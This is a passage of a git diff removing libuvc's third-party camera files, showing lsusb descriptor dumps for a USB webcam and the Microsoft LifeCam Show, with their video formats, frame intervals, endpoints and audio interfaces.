-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                             6
-        bDescriptorType                    36
-        bDescriptorSubtype                 13 (COLORFORMAT)
-        bColorPrimaries                     1 (BT.709,sRGB)
-        bTransferCharacteristics            1 (BT.709)
-        bMatrixCoefficients                 4 (SMPTE 170M (BT.601))
-      VideoStreaming Interface Descriptor:
-        bLength                            11
-        bDescriptorType                    36
-        bDescriptorSubtype                  6 (FORMAT_MJPEG)
-        bFormatIndex                        3
-        bNumFrameDescriptors               17
-        bFlags                              1
-          Fixed-size samples: Yes
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 1 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                 24576000
-        dwMaxBitRate                147456000
-        dwMaxVideoFrameBufferSize      614400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                            90
-        dwMinBitRate                  1152000
-        dwMaxBitRate                  6912000
-        dwMaxVideoFrameBufferSize       28800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                           120
-        dwMinBitRate                  1536000
-        dwMaxBitRate                  9216000
-        dwMaxVideoFrameBufferSize       38400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         4
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            176
-        wHeight                           144
-        dwMinBitRate                  2027520
-        dwMaxBitRate                 12165120
-        dwMaxVideoFrameBufferSize       50688
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         5
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           180
-        dwMinBitRate                  4608000
-        dwMaxBitRate                 27648000
-        dwMaxVideoFrameBufferSize      115200
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         6
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                  6144000
-        dwMaxBitRate                 36864000
-        dwMaxVideoFrameBufferSize      153600
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         7
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                  8110080
-        dwMaxBitRate                 48660480
-        dwMaxVideoFrameBufferSize      202752
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         8
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            432
-        wHeight                           240
-        dwMinBitRate                  8294400
-        dwMaxBitRate                 49766400
-        dwMaxVideoFrameBufferSize      207360
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         9
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           360
-        dwMinBitRate                 18432000
-        dwMaxBitRate                110592000
-        dwMaxVideoFrameBufferSize      460800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        10
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           448
-        dwMinBitRate                 28672000
-        dwMaxBitRate                172032000
-        dwMaxVideoFrameBufferSize      716800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        11
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           600
-        dwMinBitRate                 38400000
-        dwMaxBitRate                230400000
-        dwMaxVideoFrameBufferSize      960000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        12
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            864
-        wHeight                           480
-        dwMinBitRate                 33177600
-        dwMaxBitRate                199065600
-        dwMaxVideoFrameBufferSize      829440
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        13
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            960
-        wHeight                           720
-        dwMinBitRate                 55296000
-        dwMaxBitRate                331776000
-        dwMaxVideoFrameBufferSize     1382400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        14
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1024
-        wHeight                           576
-        dwMinBitRate                 47185920
-        dwMaxBitRate                283115520
-        dwMaxVideoFrameBufferSize     1179648
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        15
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           720
-        dwMinBitRate                 73728000
-        dwMaxBitRate                442368000
-        dwMaxVideoFrameBufferSize     1843200
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        16
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                           896
-        dwMinBitRate                114688000
-        dwMaxBitRate                688128000
-        dwMaxVideoFrameBufferSize     2867200
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                        17
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1920
-        wHeight                          1080
-        dwMinBitRate                165888000
-        dwMaxBitRate                995328000
-        dwMaxVideoFrameBufferSize     4147200
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                             6
-        bDescriptorType                    36
-        bDescriptorSubtype                 13 (COLORFORMAT)
-        bColorPrimaries                     1 (BT.709,sRGB)
-        bTransferCharacteristics            1 (BT.709)
-        bMatrixCoefficients                 4 (SMPTE 170M (BT.601))
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x00c0  1x 192 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       2
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0180  1x 384 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       3
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0200  1x 512 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       4
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0280  1x 640 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       5
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0320  1x 800 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       6
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x03b0  1x 944 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       7
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0a80  2x 640 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       8
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0b20  2x 800 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       9
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0be0  2x 992 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting      10
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x1380  3x 896 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting      11
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x13fc  3x 1020 bytes
-        bInterval               1
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         2
-      bInterfaceCount         2
-      bFunctionClass          1 Audio
-      bFunctionSubClass       2 Streaming
-      bFunctionProtocol       0 
-      iFunction               0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        2
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      1 Control Device
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdADC               1.00
-        wTotalLength           38
-        bInCollection           1
-        baInterfaceNr( 0)       3
-      AudioControl Interface Descriptor:
-        bLength                12
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Microphone
-        bAssocTerminal          0
-        bNrChannels             1
-        wChannelConfig     0x0003
-          Left Front (L)
-          Right Front (R)
-        iChannelNames           0 
-        iTerminal               0 
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             3
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          0
-        bSourceID               5
-        iTerminal               0 
-      AudioControl Interface Descriptor:
-        bLength                 8
-        bDescriptorType        36
-        bDescriptorSubtype      6 (FEATURE_UNIT)
-        bUnitID                 5
-        bSourceID               1
-        bControlSize            1
-        bmaControls( 0)      0x03
-          Mute Control
-          Volume Control
-        iFeature                0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                255 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             2
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            1 Discrete
-        tSamFreq[ 0]        16000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0044  1x 68 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       2
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                255 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             2
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            1 Discrete
-        tSamFreq[ 0]        24000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0064  1x 100 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       3
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                255 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             2
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            1 Discrete
-        tSamFreq[ 0]        32000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0084  1x 132 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-Device Qualifier (for other device speed):
-  bLength                10
-  bDescriptorType         6
-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  bNumConfigurations      1
-Device Status:     0x0000
-  (Bus Powered)
diff --git a/thirdparty/libuvc-0.0.6/cameras/ms_lifecam_show.txt b/thirdparty/libuvc-0.0.6/cameras/ms_lifecam_show.txt
deleted file mode 100644
index d8f9650..0000000
--- a/thirdparty/libuvc-0.0.6/cameras/ms_lifecam_show.txt
+++ /dev/null
@@ -1,767 +0,0 @@
-
-Bus 001 Device 010: ID 045e:0729 Microsoft Corp. 
-Device Descriptor:
-  bLength                18
-  bDescriptorType         1
-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  idVendor           0x045e Microsoft Corp.
-  idProduct          0x0729 
-  bcdDevice            1.00
-  iManufacturer           1 Microsoft
-  iProduct                2 Microsoft® LifeCam Show(TM)
-  iSerial                 0 
-  bNumConfigurations      1
-  Configuration Descriptor:
-    bLength                 9
-    bDescriptorType         2
-    wTotalLength          961
-    bNumInterfaces          5
-    bConfigurationValue     1
-    iConfiguration          0 
-    bmAttributes         0x80
-      (Bus Powered)
-    MaxPower              320mA
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         0
-      bInterfaceCount         2
-      bFunctionClass         14 Video
-      bFunctionSubClass       3 Video Interface Collection
-      bFunctionProtocol       0 
-      iFunction               2 Microsoft® LifeCam Show(TM)
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        0
-      bAlternateSetting       0
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      1 Video Control
-      bInterfaceProtocol      0 
-      iInterface              2 Microsoft® LifeCam Show(TM)
-      VideoControl Interface Descriptor:
-        bLength                13
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdUVC               1.00
-        wTotalLength           79
-        dwClockFrequency       24.000000MHz
-        bInCollection           1
-        baInterfaceNr( 0)       1
-      VideoControl Interface Descriptor:
-        bLength                18
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Camera Sensor
-        bAssocTerminal          0
-        iTerminal               0 
-        wObjectiveFocalLengthMin      0
-        wObjectiveFocalLengthMax      0
-        wOcularFocalLength            0
-        bControlSize                  3
-        bmControls           0x00000a0a
-          Auto-Exposure Mode
-          Exposure Time (Absolute)
-          Zoom (Absolute)
-          PanTilt (Absolute)
-      VideoControl Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      5 (PROCESSING_UNIT)
-      Warning: Descriptor too short
-        bUnitID                 2
-        bSourceID               1
-        wMaxMultiplier          0
-        bControlSize            2
-        bmControls     0x0000073b
-          Brightness
-          Contrast
-          Saturation
-          Sharpness
-          Gamma
-          Backlight Compensation
-          Gain
-          Power Line Frequency
-        iProcessing             0 
-        bmVideoStandards     0x 9
-          None
-          SECAM - 625/50
-      VideoControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             3
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          0
-        bSourceID               2
-        iTerminal               0 
-      VideoControl Interface Descriptor:
-        bLength                28
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                 4
-        guidExtensionCode         {5dc717a9-1941-da11-ae0e-000d56ac7b4c}
-        bNumControl             8
-        bNrPins                 1
-        baSourceID( 0)          1
-        bControlSize            3
-        bmControls( 0)       0xf9
-        bmControls( 1)       0x01
-        bmControls( 2)       0xc0
-        iExtension              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            3
-          Transfer Type            Interrupt
-          Synch Type               None
-          Usage Type               Data
-        wMaxPacketSize     0x000a  1x 10 bytes
-        bInterval               5
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoStreaming Interface Descriptor:
-        bLength                            15
-        bDescriptorType                    36
